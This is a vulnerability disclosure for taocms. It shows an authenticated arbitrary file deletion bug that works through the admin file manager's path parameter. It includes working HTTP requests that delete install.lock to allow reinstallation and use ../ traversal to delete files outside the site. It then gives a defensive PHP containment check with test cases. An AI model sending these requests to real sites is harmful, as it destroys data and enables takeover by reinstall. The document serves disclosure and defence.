taocms arbitrary file deletion vulnerability

Attack condition: requires a login to the admin (management) panel.

1. Open taocms/include/Model/File.php and find the file deletion code. The request URL is admin.php?action=file&ctrl=del&path=, which receives the parameter path.


2. When taocms is installed, the install.lock file is generated in the data directory.


3. At this point, when I visit install.php, it reports that it is already installed.


4. With the request below, I delete the install.lock file:

   ```http
   GET /admin/admin.php?action=file&ctrl=del&path=/data/install.lock HTTP/1.1
   Host: 127.0.0.1:9999
   User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Connection: close
   Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
   Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
   Upgrade-Insecure-Requests: 1
   Sec-Fetch-Dest: frame
   Sec-Fetch-Mode: navigate
   Sec-Fetch-Site: same-origin
   Sec-Fetch-User: ?1
   ```
5. Surprisingly, it is removed successfully.


6. I visit install.php again; taocms now allows reinstallation.


7. Also, create a new test.txt file in your own user directory.


8. When I send the delete payload, test.txt is deleted:

   ```http
   GET /admin/admin.php?action=file&ctrl=del&path=/../../../test.txt HTTP/1.1
   Host: 127.0.0.1:9999
   User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Connection: close
   Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
   Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
   Upgrade-Insecure-Requests: 1
   Sec-Fetch-Dest: frame
   Sec-Fetch-Mode: navigate
   Sec-Fetch-Site: same-origin
   Sec-Fetch-User: ?1
   ```

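The root cause shown above is that the `path` parameter of the `ctrl=del` handler is joined to a directory and deleted without being confined to that directory. The following is an added example of the check a file manager should perform before calling `unlink()`; it is not taocms code, and the function name `resolveDeletable`, the temporary directory layout and the protected-file list are assumptions for illustration. It canonicalises the requested path with `realpath()`, refuses anything that resolves outside the base directory, and additionally refuses a small set of files (here `install.lock`) that the file manager should never remove even for a logged-in admin.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not taocms code: resolve a user-supplied "path" parameter
 * against a fixed base directory and refuse anything that escapes it.
 * Returns the canonical path that may be deleted, or null to refuse.
 * The base-directory layout and the protected-file list are illustrative.
 */
function resolveDeletable(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // A NUL byte can truncate the path in lower layers; refuse it outright.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    // Treat the parameter as relative to $base even when it starts with a slash.
    $joined = $base . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\');
    // realpath() collapses "..", symlinks and duplicate separators,
    // and returns false when the target does not exist.
    $canonical = realpath($joined);
    if ($canonical === false || !is_file($canonical)) {
        return null;
    }
    // Prefix check with a trailing separator, so base "/srv/site"
    // does not accept "/srv/site2/x".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($canonical, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Files the file manager must never remove, whatever the caller's role.
    // install.lock is the one this write-up shows being deleted; extend as needed.
    $protected = ['install.lock'];
    if (in_array(basename($canonical), $protected, true)) {
        return null;
    }
    return $canonical;
}

// Demonstration on a constructed layout inside a temporary directory:
//   <root>/site/data/install.lock   (inside base, protected)
//   <root>/site/upload/photo.jpg    (inside base, deletable)
//   <root>/test.txt                 (outside base, like the write-up's test.txt)
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'taocms-demo-' . bin2hex(random_bytes(4));
$site = $root . DIRECTORY_SEPARATOR . 'site';
mkdir($site . '/data', 0700, true);
mkdir($site . '/upload', 0700, true);
file_put_contents($site . '/data/install.lock', 'installed');
file_put_contents($site . '/upload/photo.jpg', 'jpeg');
file_put_contents($root . '/test.txt', 'outside');

$cases = [
    '/upload/photo.jpg',        // legitimate request: allowed
    '/data/install.lock',       // inside base but protected: refused
    '/../test.txt',             // traversal out of base: refused
    'upload/../../test.txt',    // traversal without a leading slash: refused
    "upload/photo.jpg\0.png",   // NUL byte: refused
];
foreach ($cases as $p) {
    $r = resolveDeletable($site, $p);
    printf("%-30s => %s\n", json_encode($p), $r === null ? 'REFUSED' : 'delete ' . $r);
}

// Clean up the constructed layout.
@unlink($site . '/upload/photo.jpg');
@unlink($site . '/data/install.lock');
@unlink($root . '/test.txt');
foreach ([$site . '/upload', $site . '/data', $site, $root] as $d) {
    @rmdir($d);
}
```

The `realpath()` call is what defeats the `/../../../test.txt` payload: it resolves the traversal before the prefix comparison runs, so the comparison is made on the real target rather than on the string the client sent. The separate deny-list is a defence in depth for the `install.lock` case, which is a valid in-base path and would otherwise pass the containment check; from the server's point of view deleting it is indistinguishable from a legitimate file-manager action unless the application says so explicitly.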